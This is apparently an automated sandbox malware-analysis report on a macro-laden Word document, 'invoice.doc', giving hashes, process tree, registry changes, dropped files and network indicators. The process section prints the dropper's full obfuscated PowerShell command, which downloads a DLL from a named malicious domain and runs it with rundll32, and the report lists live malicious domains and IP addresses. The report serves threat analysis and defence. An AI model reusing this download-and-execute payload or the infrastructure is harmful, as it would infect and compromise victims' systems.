analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

invoice.doc

Full analysis: https://app.any.run/tasks/069880d3-50de-4965-bfab-aed9de17cc1f
Verdict: Malicious activity
Analysis date: November 08, 2018, 09:35:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: James Smith, Template: Normal.dotm, Last Saved By: Windows User, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Sun Nov 4 19:24:00 2018, Last Saved Time/Date: Wed Nov 7 02:32:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5:

1374457044433A7AD196C1E43ACB15C1

SHA1:

98DC8E8DE4C6EC1E0F39331C68B2E89C8E86F6EE

SHA256:

B84E2524F59F318D5F8BD01B4CCC38FBD691F382873892D5304D760FAF0064C7

SSDEEP:

6144:vTGfXFMFu9mycXxnBWbtzcn3lgO4VoX9B38Js+:b41SyqxnBWb5cVgZaXv8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2916)
    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 2916)
    • Application was dropped or rewritten from another process

      • chaua.exe (PID: 700)
  • SUSPICIOUS

    • Creates files in the user directory

      • chaua.exe (PID: 700)
    • Uses RUNDLL32.EXE to load library

      • chaua.exe (PID: 700)
  • INFO

    • Dropped object may contain Bitcoin addresses

      • WINWORD.EXE (PID: 2916)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2916)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2916)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

CompObjUserType: ???????? Microsoft Office Word 97-2003
CompObjUserTypeLen: 39
HeadingPairs:
  • Название
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2018:11:07 02:32:00
CreateDate: 2018:11:04 19:24:00
TotalEditTime: 1.0 minutes
Software: Microsoft Office Word
RevisionNumber: 3
LastModifiedBy: Windows User
Template: Normal.dotm
Keywords: -
Author: James Smith
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
3
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
drop and start start winword.exe chaua.exe rundll32.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2916"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\invoice.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
700"C:\Users\admin\AppData\Local\Temp\qgnrahnui3\chaua.exe" $egabmypniujouovq6='ui3''';$tgvlrpmueqmvflyoaiwf='path=($en';$yeaeeaujsosbuua1=';Se';$eqkzlkejvawpqpqifkaydwuyeda='org/Xk';$ndojlceoiuoierjerlaqgmby='t System';$cahaaiilusephaohps05='php'',f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$ouboyaeuycah='t-Execu';$gyvouelayafgarddzy1='ss; f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$aobdseetzparmarmuuwf='''\z';$baaxslplaidrvehoqaymk60='cy By';$bvfrepnjwjpusrjjrwiaoffsu='hwh';$euukejdtncnqojxaoi='.dll'');';$ooqqbuoifbiiy='dFile(';$qwlofnexwuaouioaufbw='data+';$btouqdroaktfhyqgpuyyy='.Web';$fbrnyieyuiauiz='pass -Sc';$icfraektfrylkacqgwzrgfmvmzn82='rahn';$pjblncsnvyllrba25='qQkPWluO.';$wyssfngydmdwbpbsmk='prime';$uvfhheooqeaztoeg='l32 $p';$emnhxakhvharrqeobntmjkoyijq='path);';$yyvjvzbdtjnzclrpwsbswryupx='tionPoli';$yeozwuhayiomqagwja0='Downloa';$qrrflzpgijzpwkbnfktoke='(New-Ob';$znrxaxsebqjulaixhoukvxu7='Item ';$yrmeeeisxltkamiaaltb='''http://';$ioynehfvdkjqjeocmbovrs='se -for';$vtuiqqbukzaurcups1='vyeo';$urllsrgiczilzrboaetgsxhknlp='client).';$kbyowbudphqaoulhuesjjtyls='.Net';$vgnynvatppveuey60='fhj''';$alcpfemwsvbctgtlmlajfuiuyeq='ath , ''';$yjuuicgzcweoiut='f1'';Rem';$yyvcnzapjqjfxndzlldwattao='p + ''\qgn';$akouyyojompjrab='($env:tem';$mrdpdblcakqfyuydixminu05='$hj = ''';$zoflvqquooeyzilbiiqpouzlo=') -recur';$uerehhhpiebylwuauia='ove-';$micvzqjnkskthioyoskdqo='timer.';$rbkdlyuoterlqhiutjloe='v:app';$otruaanwcoaxmsxp=' rundl';$pxilntduusvjguyabvodpy='ope Proce';$aeaktrrowacvjlzyabew='ce;';$iaolcifsdafiuoesiyj='jec'; Invoke-Expression ($mrdpdblcakqfyuydixminu05+$bvfrepnjwjpusrjjrwiaoffsu+$vgnynvatppveuey60+$yeaeeaujsosbuua1+$ouboyaeuycah+$yyvjvzbdtjnzclrpwsbswryupx+$baaxslplaidrvehoqaymk60+$fbrnyieyuiauiz+$pxilntduusvjguyabvodpy+$gyvouelayafgarddzy1+$tgvlrpmueqmvflyoaiwf+$rbkdlyuoterlqhiutjloe+$qwlofnexwuaouioaufbw+$aobdseetzparmarmuuwf+$vtuiqqbukzaurcups1+$euukejdtncnqojxaoi+$qrrflzpgijzpwkbnfktoke+$iaolcifsdafiuoesiyj+$ndojlceoiuoierjerlaqgmby+$kbyowbudphqaoulhuesjjtyls+$btouqdroaktfhyqgpuyyy+$urllsrgiczilzrboaetgsxhknlp+$yeozwuhayiomqagwja0+$ooqqbuoifbiiy+$yrmeeeisxltkamiaaltb+$wyssfngydmdwbpbsmk+$micvzqjnkskthioyoskdqo+$eqkzlkejvawpqpqifkaydwuyeda+$pjblncsnvyllrba25+$cahaaiilusephaohps05+$emnhxakhvharrqeobntmjkoyijq+$otruaanwcoaxmsxp+$uvfhheooqeaztoeg+$alcpfemwsvbctgtlmlajfuiuyeq+$yjuuicgzcweoiut+$uerehhhpiebylwuauia+$znrxaxsebqjulaixhoukvxu7+$akouyyojompjrab+$yyvcnzapjqjfxndzlldwattao+$icfraektfrylkacqgwzrgfmvmzn82+$egabmypniujouovq6+$zoflvqquooeyzilbiiqpouzlo+$ioynehfvdkjqjeocmbovrs+$aeaktrrowacvjlzyabew);C:\Users\admin\AppData\Local\Temp\qgnrahnui3\chaua.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1684"C:\Windows\system32\rundll32.exe" C:\Users\admin\AppData\Roaming\zvyeo.dll f1C:\Windows\system32\rundll32.exechaua.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 502
Read events
1 088
Write events
402
Delete events
12

Modification events

(PID) Process:(2916) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:(#l
Value:
28236C00640B0000010000000000000000000000
(PID) Process:(2916) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2916) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2916) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1298661391
(PID) Process:(2916) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661504
(PID) Process:(2916) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1298661505
(PID) Process:(2916) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
640B00005A1E5A624677D40100000000
(PID) Process:(2916) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:n$l
Value:
6E246C00640B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2916) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:n$l
Value:
6E246C00640B000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(2916) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
13
Suspicious files
0
Text files
123
Unknown types
4

Dropped files

PID
Process
Filename
Type
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA728.tmp.cvr
MD5:
SHA256:
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\qgnrahnui3\Diagnostics.Format.ps1xmltext
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC
SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689
2916WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\invoice.doc.LNKlnk
MD5:774B77253443BF68292397B4257E3C33
SHA256:5C64C7624437F2B34D6D786E5D5913ADDD6B62D8C1187229FC4FBFF748643530
2916WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:7B84A1B98D4FA5D7D8643C8E5C2240CD
SHA256:E703AC9516525A41B7C1FAE95753B8F4EE2B37E5ACE99A9A18589F040AE7AEFB
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\qgnrahnui3\DotNetTypes.format.ps1xmlxml
MD5:1AB2FD4B6749AD6831C86411FDCAFB48
SHA256:98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\qgnrahnui3\CompiledComposition.Microsoft.PowerShell.GPowerShell.dllexecutable
MD5:A84B6952AB6A297CCE6C085FA8AB06CB
SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\qgnrahnui3\Certificate.format.ps1xmlxml
MD5:C93A361112351B30E2C959E72789952D
SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D
2916WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:8CB2D1BCE7DE3585DC8A41170F08FF04
SHA256:4C13169CFA4154F5B440238020681E44D341C386D842BFCAE3A5CBD903356D51
2916WINWORD.EXEC:\Users\admin\Desktop\~$nvoice.docpgc
MD5:3F911E6D8515D8D512CE9B2C8D8C5A2E
SHA256:CFE914353EA42FAA8BBD49A23E7897B23A2E7CF205FF581EF1DB4BFE93924B6C
2916WINWORD.EXEC:\Users\admin\AppData\Local\Temp\qgnrahnui3\en-US\about_Command_Syntax.help.txttext
MD5:847B0C3A6010660492ECC1D88A69210D
SHA256:7D7EE4469AE76392317DC7E16E716B5767BD7EEFCDC39F60C51ED1DA2E99AE2B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
700
chaua.exe
GET
77.85.38.18:80
http://primetimer.org/XkqQkPWluO.php
BG
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
700
chaua.exe
77.85.38.18:80
primetimer.org
Vivacom
BG
unknown

DNS requests

Domain
IP
Reputation
primetimer.org
  • 77.85.38.18
  • 78.100.245.97
  • 109.199.157.158
  • 79.121.73.1
  • 84.238.146.82
  • 91.201.175.46
  • 91.139.196.113
  • 41.204.244.84
  • 197.255.225.249
  • 193.107.99.167
malicious

Threats

No threats detected
No debug info